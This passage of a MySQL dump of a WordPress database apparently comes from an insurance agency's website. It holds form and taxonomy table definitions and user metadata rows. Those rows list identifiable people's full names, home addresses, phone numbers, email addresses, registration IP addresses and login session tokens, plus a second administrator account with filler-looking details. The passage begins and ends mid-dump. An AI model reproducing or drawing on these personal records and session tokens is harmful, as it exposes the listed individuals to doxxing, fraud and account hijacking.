character_set_client = utf8 */; CREATE TABLE `wp_rg_form_view` ( `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `form_id` mediumint(8) unsigned NOT NULL, `date_created` datetime NOT NULL, `ip` char(15) DEFAULT NULL, `count` mediumint(8) unsigned NOT NULL DEFAULT '1', PRIMARY KEY (`id`), KEY `form_id` (`form_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_rg_form_view` -- LOCK TABLES `wp_rg_form_view` WRITE; /*!40000 ALTER TABLE `wp_rg_form_view` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_rg_form_view` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_rg_incomplete_submissions` -- DROP TABLE IF EXISTS `wp_rg_incomplete_submissions`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_rg_incomplete_submissions` ( `uuid` char(32) NOT NULL, `email` varchar(255) DEFAULT NULL, `form_id` mediumint(8) unsigned NOT NULL, `date_created` datetime NOT NULL, `ip` varchar(39) NOT NULL, `source_url` longtext NOT NULL, `submission` longtext NOT NULL, PRIMARY KEY (`uuid`), KEY `form_id` (`form_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_rg_incomplete_submissions` -- LOCK TABLES `wp_rg_incomplete_submissions` WRITE; /*!40000 ALTER TABLE `wp_rg_incomplete_submissions` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_rg_incomplete_submissions` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_rg_lead` -- DROP TABLE IF EXISTS `wp_rg_lead`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_rg_lead` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `form_id` mediumint(8) unsigned NOT NULL, `post_id` bigint(20) unsigned DEFAULT NULL, `date_created` datetime NOT NULL, `is_starred` tinyint(1) NOT NULL DEFAULT '0', `is_read` tinyint(1) NOT NULL DEFAULT '0', `ip` varchar(39) NOT NULL, `source_url` varchar(200) NOT NULL DEFAULT '', `user_agent` varchar(250) NOT NULL DEFAULT '', `currency` varchar(5) DEFAULT NULL, `payment_status` varchar(15) DEFAULT NULL, `payment_date` datetime DEFAULT NULL, `payment_amount` decimal(19,2) DEFAULT NULL, `payment_method` varchar(30) DEFAULT NULL, `transaction_id` varchar(50) DEFAULT NULL, `is_fulfilled` tinyint(1) DEFAULT NULL, `created_by` bigint(20) unsigned DEFAULT NULL, `transaction_type` tinyint(1) DEFAULT NULL, `status` varchar(20) NOT NULL DEFAULT 'active', PRIMARY KEY (`id`), KEY `form_id` (`form_id`), KEY `status` (`status`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_rg_lead` -- LOCK TABLES `wp_rg_lead` WRITE; /*!40000 ALTER TABLE `wp_rg_lead` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_rg_lead` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_rg_lead_detail` -- DROP TABLE IF EXISTS `wp_rg_lead_detail`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_rg_lead_detail` ( `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `lead_id` int(10) unsigned NOT NULL, `form_id` mediumint(8) unsigned NOT NULL, `field_number` float NOT NULL, `value` longtext, PRIMARY KEY (`id`), KEY `form_id` (`form_id`), KEY `lead_id` (`lead_id`), KEY `lead_field_number` (`lead_id`,`field_number`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_rg_lead_detail` -- LOCK TABLES `wp_rg_lead_detail` WRITE; /*!40000 ALTER TABLE `wp_rg_lead_detail` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_rg_lead_detail` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_rg_lead_detail_long` -- DROP TABLE IF EXISTS `wp_rg_lead_detail_long`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_rg_lead_detail_long` ( `lead_detail_id` bigint(20) unsigned NOT NULL, `value` longtext, PRIMARY KEY (`lead_detail_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_rg_lead_detail_long` -- LOCK TABLES `wp_rg_lead_detail_long` WRITE; /*!40000 ALTER TABLE `wp_rg_lead_detail_long` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_rg_lead_detail_long` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_rg_lead_meta` -- DROP TABLE IF EXISTS `wp_rg_lead_meta`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_rg_lead_meta` ( `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `form_id` mediumint(8) unsigned NOT NULL DEFAULT '0', `lead_id` bigint(20) unsigned NOT NULL, `meta_key` varchar(255) DEFAULT NULL, `meta_value` longtext, PRIMARY KEY (`id`), KEY `meta_key` (`meta_key`(191)), KEY `lead_id` (`lead_id`), KEY `form_id_meta_key` (`form_id`,`meta_key`(191)) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_rg_lead_meta` -- LOCK TABLES `wp_rg_lead_meta` WRITE; /*!40000 ALTER TABLE `wp_rg_lead_meta` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_rg_lead_meta` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_rg_lead_notes` -- DROP TABLE IF EXISTS `wp_rg_lead_notes`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_rg_lead_notes` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `lead_id` int(10) unsigned NOT NULL, `user_name` varchar(250) DEFAULT NULL, `user_id` bigint(20) DEFAULT NULL, `date_created` datetime NOT NULL, `value` longtext, `note_type` varchar(50) DEFAULT NULL, PRIMARY KEY (`id`), KEY `lead_id` (`lead_id`), KEY `lead_user_key` (`lead_id`,`user_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_rg_lead_notes` -- LOCK TABLES `wp_rg_lead_notes` WRITE; /*!40000 ALTER TABLE `wp_rg_lead_notes` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_rg_lead_notes` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_subscribe` -- DROP TABLE IF EXISTS `wp_subscribe`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_subscribe` ( `id` int(20) NOT NULL AUTO_INCREMENT, `name` varchar(200) NOT NULL, `email` varchar(200) NOT NULL, `message` varchar(5000) NOT NULL, PRIMARY KEY (`id`), UNIQUE KEY `email` (`email`) ) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=latin1; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_subscribe` -- LOCK TABLES `wp_subscribe` WRITE; /*!40000 ALTER TABLE `wp_subscribe` DISABLE KEYS */; INSERT INTO `wp_subscribe` VALUES (1,'','malky@empireins.com',''),(2,'CB','CHESKEL@EMPIREINS.COM','test '); /*!40000 ALTER TABLE `wp_subscribe` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_term_relationships` -- DROP TABLE IF EXISTS `wp_term_relationships`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_term_relationships` ( `object_id` bigint(20) unsigned NOT NULL DEFAULT '0', `term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT '0', `term_order` int(11) NOT NULL DEFAULT '0', PRIMARY KEY (`object_id`,`term_taxonomy_id`), KEY `term_taxonomy_id` (`term_taxonomy_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_term_relationships` -- LOCK TABLES `wp_term_relationships` WRITE; /*!40000 ALTER TABLE `wp_term_relationships` DISABLE KEYS */; INSERT INTO `wp_term_relationships` VALUES (17,2,0),(18,2,0),(19,2,0),(20,2,0),(109,1,0),(129,7,0),(129,22,0),(131,7,0),(131,22,0),(189,2,0),(218,6,0),(218,23,0),(222,6,0),(222,23,0),(223,5,0),(223,25,0),(225,3,0),(225,24,0),(226,3,0),(226,24,0),(234,2,0),(277,1,0),(277,13,0),(277,14,0),(283,1,0),(283,17,0),(283,18,0),(283,19,0),(288,1,0),(288,15,0),(288,16,0),(290,1,0),(290,14,0),(290,20,0),(290,21,0),(336,2,0); /*!40000 ALTER TABLE `wp_term_relationships` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_term_taxonomy` -- DROP TABLE IF EXISTS `wp_term_taxonomy`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_term_taxonomy` ( `term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `term_id` bigint(20) unsigned NOT NULL DEFAULT '0', `taxonomy` varchar(32) NOT NULL DEFAULT '', `description` longtext NOT NULL, `parent` bigint(20) unsigned NOT NULL DEFAULT '0', `count` bigint(20) NOT NULL DEFAULT '0', PRIMARY KEY (`term_taxonomy_id`), UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`), KEY `taxonomy` (`taxonomy`) ) ENGINE=InnoDB AUTO_INCREMENT=27 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_term_taxonomy` -- LOCK TABLES `wp_term_taxonomy` WRITE; /*!40000 ALTER TABLE `wp_term_taxonomy` DISABLE KEYS */; INSERT INTO `wp_term_taxonomy` VALUES (1,1,'category','',0,4),(2,2,'nav_menu','',0,7),(3,3,'category','',0,2),(5,5,'category','',0,1),(6,6,'category','',0,2),(7,7,'category','',0,2),(13,13,'post_tag','',0,1),(14,14,'post_tag','',0,2),(15,15,'post_tag','',0,1),(16,16,'post_tag','',0,1),(17,17,'post_tag','',0,1),(18,18,'post_tag','',0,1),(19,19,'post_tag','',0,1),(20,20,'post_tag','',0,1),(21,21,'post_tag','',0,1),(22,22,'team','',0,2),(23,23,'team','',0,2),(24,24,'team','',0,2),(25,25,'team','',0,1),(26,26,'category','',0,0); /*!40000 ALTER TABLE `wp_term_taxonomy` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_terms` -- DROP TABLE IF EXISTS `wp_terms`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_terms` ( `term_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `name` varchar(200) NOT NULL DEFAULT '', `slug` varchar(200) NOT NULL DEFAULT '', `term_group` bigint(10) NOT NULL DEFAULT '0', PRIMARY KEY (`term_id`), KEY `name` (`name`), KEY `slug` (`slug`) ) ENGINE=InnoDB AUTO_INCREMENT=27 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_terms` -- LOCK TABLES `wp_terms` WRITE; /*!40000 ALTER TABLE `wp_terms` DISABLE KEYS */; INSERT INTO `wp_terms` VALUES (1,'Uncategorised','uncategorised',0),(2,'header-menu','header-menu',0),(3,'Executive','executive',0),(5,'Commissions','commissions',0),(6,'Marketing and Sales','marketing-and-sales',0),(7,'New Business','new-business',0),(13,'John Hancock','john-hancock',0),(14,'LTC','ltc',0),(15,'Voya','voya',0),(16,'Aviation','aviation',0),(17,'AIG','aig',0),(18,'New York','new-york',0),(19,'Term Insurance','term-insurance',0),(20,'Companion','companion',0),(21,'Chronic Illness','chronic-illness',0),(22,'New Business','new-business',0),(23,'Marketing and Sales','marketing-and-sales',0),(24,'Executive','executive',0),(25,'Commissions','commissions',0),(26,'uncategorized','uncategorized',0); /*!40000 ALTER TABLE `wp_terms` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_usermeta` -- DROP TABLE IF EXISTS `wp_usermeta`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_usermeta` ( `umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `user_id` bigint(20) unsigned NOT NULL DEFAULT '0', `meta_key` varchar(255) DEFAULT NULL, `meta_value` longtext, PRIMARY KEY (`umeta_id`), KEY `user_id` (`user_id`), KEY `meta_key` (`meta_key`) ) ENGINE=InnoDB AUTO_INCREMENT=7353 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_usermeta` -- LOCK TABLES `wp_usermeta` WRITE; /*!40000 ALTER TABLE `wp_usermeta` DISABLE KEYS */; INSERT INTO `wp_usermeta` VALUES (1,1,'first_name',''),(2,1,'last_name',''),(3,1,'nickname','admin'),(4,1,'description',''),(5,1,'rich_editing','true'),(6,1,'comment_shortcuts','false'),(7,1,'admin_color','fresh'),(8,1,'use_ssl','0'),(9,1,'show_admin_bar_front','true'),(10,1,'wp_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(11,1,'wp_user_level','10'),(12,1,'dismissed_wp_pointers','wp350_media,wp360_revisions,wp360_locks,wp390_widgets,wp410_dfw'),(13,1,'show_welcome_panel','1'),(14,1,'wp_dashboard_quick_press_last_post_id','522'),(15,1,'wp_user-settings','libraryContent=browse&editor=tinymce&ed_size=307&dfw_width=822&hidetb=1&posts_list_mode=list&wplink=1&mfold=o&post_dfw=off'),(16,1,'wp_user-settings-time','1454472718'),(17,1,'managenav-menuscolumnshidden','a:3:{i:0;s:11:\"css-classes\";i:1;s:3:\"xfn\";i:2;s:11:\"description\";}'),(18,1,'metaboxhidden_nav-menus','a:2:{i:0;s:8:\"add-post\";i:1;s:12:\"add-post_tag\";}'),(19,1,'nav_menu_recently_edited','2'),(20,1,'meta-box-order_post','a:3:{s:4:\"side\";s:51:\"submitdiv,postimagediv,categorydiv,tagsdiv-post_tag\";s:6:\"normal\";s:71:\"postexcerpt,trackbacksdiv,postcustom,commentstatusdiv,slugdiv,authordiv\";s:8:\"advanced\";s:0:\"\";}'),(21,1,'screen_layout_post','2'),(22,1,'meta-box-order_featured_tools','a:3:{s:4:\"side\";s:36:\"submitdiv,postimagediv,pageparentdiv\";s:6:\"normal\";s:69:\"postexcerpt,postcustom,commentstatusdiv,commentsdiv,slugdiv,authordiv\";s:8:\"advanced\";s:0:\"\";}'),(23,1,'screen_layout_featured_tools','2'),(24,1,'meta-box-order_clients','a:3:{s:4:\"side\";s:35:\"submitdiv,pageparentdiv,categorydiv\";s:6:\"normal\";s:21:\"my-meta-box-2,slugdiv\";s:8:\"advanced\";s:0:\"\";}'),(25,1,'screen_layout_clients','2'),(47,1,'meta-box-order_page','a:3:{s:4:\"side\";s:56:\"submitdiv,wpmem-block-meta-id,pageparentdiv,postimagediv\";s:6:\"normal\";s:57:\"postcustom,commentstatusdiv,commentsdiv,slugdiv,authordiv\";s:8:\"advanced\";s:0:\"\";}'),(48,1,'screen_layout_page','2'),(49,1,'closedpostboxes_agent_tools','a:0:{}'),(50,1,'metaboxhidden_agent_tools','a:1:{i:0;s:7:\"slugdiv\";}'),(51,1,'closedpostboxes_post','a:0:{}'),(52,1,'metaboxhidden_post','a:7:{i:0;s:11:\"postexcerpt\";i:1;s:13:\"trackbacksdiv\";i:2;s:10:\"postcustom\";i:3;s:16:\"commentstatusdiv\";i:4;s:7:\"slugdiv\";i:5;s:9:\"authordiv\";i:6;s:11:\"commentsdiv\";}'),(53,1,'closedpostboxes_page','a:0:{}'),(54,1,'metaboxhidden_page','a:4:{i:0;s:16:\"commentstatusdiv\";i:1;s:11:\"commentsdiv\";i:2;s:7:\"slugdiv\";i:3;s:9:\"authordiv\";}'),(121,1,'addr1',''),(122,1,'addr2',''),(123,1,'city',''),(124,1,'thestate',''),(125,1,'zip',''),(126,1,'country',''),(127,1,'phone1',''),(128,1,'tos',''),(129,1,'BGusername',''),(151,7,'nickname','RosettaCastellan'),(152,7,'first_name','Rosetta'),(153,7,'last_name','Castellano'),(154,7,'description',''),(155,7,'rich_editing','true'),(156,7,'comment_shortcuts','false'),(157,7,'admin_color','fresh'),(158,7,'use_ssl','0'),(159,7,'show_admin_bar_front','true'),(160,7,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(161,7,'wp_user_level','0'),(162,7,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(163,7,'addr1','1367 Dundas St'),(164,7,'addr2','1367 Dundas St'),(165,7,'city','London'),(166,7,'thestate','ON'),(167,7,'zip','N6b 3l5'),(168,7,'country','Canada'),(169,7,'phone1','519-494-7570'),(170,7,'wpmem_reg_ip','104.144.65.248'),(171,7,'wpmem_reg_url','http://www.empireins.com/register/'),(172,1,'active','1'),(215,10,'nickname','admin2'),(216,10,'first_name',''),(217,10,'last_name',''),(218,10,'description',''),(219,10,'rich_editing','true'),(220,10,'comment_shortcuts','false'),(221,10,'admin_color','fresh'),(222,10,'use_ssl','0'),(223,10,'show_admin_bar_front','true'),(224,10,'wp_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(225,10,'wp_user_level','10'),(226,10,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(227,10,'addr1','825 Alexander,dr.'),(228,10,'addr2','eter'),(229,10,'city','Khulna,Bangladesh'),(230,10,'thestate','test'),(231,10,'zip','200'),(232,10,'country','Singapore'),(233,10,'phone1','123456'),(234,10,'wpmem_reg_ip','58.97.236.104'),(235,10,'wpmem_reg_url','http://www.empireins.com/register/'),(238,13,'nickname','jzicher'),(241,13,'first_name','Yoel'),(244,13,'last_name','Zicherman'),(247,13,'description',''),(250,13,'rich_editing','true'),(253,13,'comment_shortcuts','false'),(256,13,'admin_color','fresh'),(259,13,'use_ssl','0'),(262,13,'show_admin_bar_front','true'),(265,13,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(268,13,'wp_user_level','0'),(271,13,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(274,13,'addr1','3 Getzil Berger blvd'),(277,13,'addr2','Unit 301'),(280,13,'city','Monroe'),(283,13,'thestate','NY'),(286,13,'zip','10950'),(289,13,'country','United States'),(292,13,'phone1','8456621084'),(295,13,'wpmem_reg_ip','108.58.88.178'),(298,13,'wpmem_reg_url','http://www.empireins.com/term-quotes/'),(299,13,'tos',''),(302,13,'active','1'),(305,13,'session_tokens','a:2:{s:64:\"d4b970dbaba9c11ce0362dd6d2fde2e43d77268274faac393b7e5dea005fd2bb\";a:4:{s:10:\"expiration\";i:1463156828;s:2:\"ip\";s:13:\"108.58.88.178\";s:2:\"ua\";s:108:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36\";s:5:\"login\";i:1462984028;}s:64:\"24c985ede1fcf9730c85e464b86aa8dd4cc53a2cbd5e1219f4dc6065cad0674f\";a:4:{s:10:\"expiration\";i:1463253254;s:2:\"ip\";s:13:\"108.58.88.178\";s:2:\"ua\";s:108:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36\";s:5:\"login\";i:1463080454;}}'),(308,14,'nickname','jetset18'),(311,14,'first_name','David'),(314,14,'last_name','Stern'),(317,14,'description',''),(320,14,'rich_editing','true'),(323,14,'comment_shortcuts','false'),(326,14,'admin_color','fresh'),(329,14,'use_ssl','0'),(332,14,'show_admin_bar_front','true'),(335,14,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(338,14,'wp_user_level','0'),(341,14,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(344,14,'addr1','1491 E 18th Street'),(347,14,'addr2',''),(350,14,'city','Brooklyn'),(353,14,'thestate','NY'),(356,14,'zip','11230'),(359,14,'country','USS'),(362,14,'phone1','9179844547'),(365,14,'wpmem_reg_ip','70.210.68.2'),(368,14,'wpmem_reg_url','http://www.empireins.com/carriers/'),(371,14,'tos',''),(374,14,'active','1'),(376,16,'nickname','cheskelb'),(379,16,'first_name','Cheskel'),(382,16,'last_name','Braver'),(385,16,'description',''),(388,16,'rich_editing','true'),(391,16,'comment_shortcuts','false'),(394,16,'admin_color','fresh'),(397,16,'use_ssl','0'),(400,16,'show_admin_bar_front','true'),(403,16,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(406,16,'wp_user_level','0'),(409,16,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(412,16,'addr1','115 Skillman St.'),(415,16,'addr2','#2'),(418,16,'city','Brooklyn'),(421,16,'thestate','NY'),(424,16,'zip','11205'),(427,16,'country','United States'),(430,16,'phone1','7182189647'),(433,16,'wpmem_reg_ip','108.58.88.178'),(436,16,'wpmem_reg_url','http://www.empireins.com/term-quotes/'),(506,16,'tos',''),(509,16,'active','1'),(517,22,'nickname','execut1ve'),(520,22,'first_name','Nuchem'),(523,22,'last_name','Lebovits'),(526,22,'description',''),(529,22,'rich_editing','true'),(532,22,'comment_shortcuts','false'),(535,22,'admin_color','fresh'),(538,22,'use_ssl','0'),(541,22,'show_admin_bar_front','true'),(544,22,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(547,22,'wp_user_level','0'),(550,22,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(553,22,'addr1','15 Silver Ter #1'),(556,22,'addr2','P.O. Box 269'),(559,22,'city','Kiamesha Lake'),(562,22,'thestate','New York'),(565,22,'zip','12751'),(568,22,'country','United States'),(571,22,'phone1','8454232900'),(574,22,'wpmem_reg_ip','96.250.55.170'),(577,22,'wpmem_reg_url','http://www.empireins.com/licensing-contracting/'),(578,23,'nickname','Uniart'),(581,23,'first_name','Sam'),(584,23,'last_name','Schnitzler'),(587,23,'description',''),(590,23,'rich_editing','true'),(593,23,'comment_shortcuts','false'),(596,23,'admin_color','fresh'),(599,23,'use_ssl','0'),(602,23,'show_admin_bar_front','true'),(605,23,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(608,23,'wp_user_level','0'),(611,23,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(614,23,'addr1','46 Main St.'),(617,23,'addr2',''),(620,23,'city','Monsey'),(623,23,'thestate','New York'),(626,23,'zip','10952'),(629,23,'country','United States'),(632,23,'phone1','8453561590'),(635,23,'wpmem_reg_ip','70.199.96.216'),(638,23,'wpmem_reg_url','http://www.empireins.com/agent-tools/'),(640,25,'nickname','syfriedman'),(643,25,'first_name','Samuel'),(646,25,'last_name','Friedman'),(649,25,'description',''),(652,25,'rich_editing','true'),(655,25,'comment_shortcuts','false'),(658,25,'admin_color','fresh'),(661,25,'use_ssl','0'),(664,25,'show_admin_bar_front','true'),(667,25,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(670,25,'wp_user_level','0'),(673,25,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(676,25,'addr1','2 Fawn Hill Drive'),(679,25,'addr2',''),(682,25,'city','Airmont'),(685,25,'thestate','Ny'),(688,25,'zip','10952'),(691,25,'country','USA'),(694,25,'phone1','347-385-2121'),(697,25,'wpmem_reg_ip','206.210.27.33'),(700,25,'wpmem_reg_url','http://www.empireins.com/term-quotes/'),(703,23,'tos',''),(706,23,'active','1'),(707,22,'tos',''),(710,22,'active','1'),(712,25,'tos',''),(715,25,'active','1'),(718,23,'session_tokens','a:1:{s:64:\"c12364fa0847a8753075827f28042221a99df020a840b462b01ea205ad3b90e9\";a:4:{s:10:\"expiration\";i:1451751082;s:2:\"ip\";s:13:\"96.224.199.60\";s:2:\"ua\";s:102:\"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36\";s:5:\"login\";i:1451578282;}}'),(722,22,'session_tokens','a:4:{s:64:\"46c5d551d92789d1923f3a9e1292bf187cc63974db62901b95af7e8f032824bf\";a:4:{s:10:\"expiration\";i:1462388640;s:2:\"ip\";s:13:\"96.250.55.170\";s:2:\"ua\";s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36\";s:5:\"login\";i:1462215840;}s:64:\"f73a1f1bc3f284aad07aab86b62e459f142d22cd0fde49040da051d62c05de50\";a:4:{s:10:\"expiration\";i:1462390246;s:2:\"ip\";s:13:\"96.250.55.170\";s:2:\"ua\";s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36\";s:5:\"login\";i:1462217446;}s:64:\"162ff5f7abcd1d6480a696f6d4e2dd6aff0ccefaf8edee4c5d5c1c833247c5dd\";a:4:{s:10:\"expiration\";i:1462392736;s:2:\"ip\";s:13:\"96.250.55.170\";s:2:\"ua\";s:108:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36\";s:5:\"login\";i:1462219936;}s:64:\"9744d4b5e7883dd0dec472a9b63b9189146311f0a5996962132181f3e3bd9dbe\";a:4:{s:10:\"expiration\";i:1463430223;s:2:\"ip\";s:13:\"96.250.55.170\";s:2:\"ua\";s:108:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36\";s:5:\"login\";i:1462220623;}}'),(724,28,'nickname','perilane'),(727,28,'first_name','peri'),(730,28,'last_name','lane'),(733,28,'description',''),(736,28,'rich_editing','true'),(739,28,'comment_shortcuts','false'),(742,28,'admin_color','fresh'),(745,28,'use_ssl','0'),(748,28,'show_admin_bar_front','true'),(751,28,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(754,28,'wp_user_level','0'),(757,28,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(760,28,'addr1','P.O. Box 1683'),(763,28,'addr2',''),(766,28,'city','Annapolis'),(769,28,'thestate','Maryland'),(772,28,'zip','21404'),(775,28,'country','United States'),(778,28,'phone1','4102676777'),(781,28,'active','1'),(782,28,'session_tokens','a:6:{s:64:\"617c63a9de24dbbf1d5c39d8d5e10c2a9669dec5ae271fb574733ed81b721c11\";a:4:{s:10:\"expiration\";i:1452109743;s:2:\"ip\";s:13:\"100.34.109.11\";s:2:\"ua\";s:70:\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)\";s:5:\"login\";i:1451936943;}s:64:\"b38226e6c988d4bd53c428bec3a0f3a79a047d9ab2cbdebfc5c88e2aa67e0bc7\";a:4:{s:10:\"expiration\";i:1452109936;s:2:\"ip\";s:13:\"100.34.109.11\";s:2:\"ua\";s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36\";s:5:\"login\";i:1451937136;}s:64:\"835cee7c7d19050da852e84a90ec3690b064eba991906c21ed6d602835f5e0e5\";a:4:{s:10:\"expiration\";i:1452172021;s:2:\"ip\";s:13:\"100.34.109.11\";s:2:\"ua\";s:70:\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)\";s:5:\"login\";i:1451999221;}s:64:\"cc2eebb208a634ba6954d1dc01ea89cb040988a43f4b8e75ba3378fae5636b7b\";a:4:{s:10:\"expiration\";i:1452172377;s:2:\"ip\";s:13:\"100.34.109.11\";s:2:\"ua\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\";s:5:\"login\";i:1451999577;}s:64:\"8ce401a6e13ccbb0a7218f03efcb670a1c5fe97863a81e0f4f1959a53db55242\";a:4:{s:10:\"expiration\";i:1452172487;s:2:\"ip\";s:13:\"100.34.109.11\";s:2:\"ua\";s:70:\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)\";s:5:\"login\";i:1451999687;}s:64:\"07f1bbdcaa3796a9c3c91e4367f1cf0d8bb12ed644a9833a57b36d0705be20e6\";a:4:{s:10:\"expiration\";i:1452172727;s:2:\"ip\";s:13:\"100.34.109.11\";s:2:\"ua\";s:70:\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)\";s:5:\"login\";i:1451999927;}}'),(784,31,'nickname','azelcer'),(787,31,'first_name','aron'),(790,31,'last_name','zelcer'),(793,31,'description',''),(796,31,'rich_editing','true'),(799,31,'comment_shortcuts','false'),(802,31,'admin_color','fresh'),(805,31,'use_ssl','0'),(808,31,'show_admin_bar_front','true'),(811,31,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(814,31,'wp_user_level','0'),(817,31,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(820,31,'addr1','p o box 700'),(823,31,'addr2',''),(826,31,'city','HARRIMAN'),(829,31,'thestate','New York'),(832,31,'zip','10926'),(835,31,'country','United 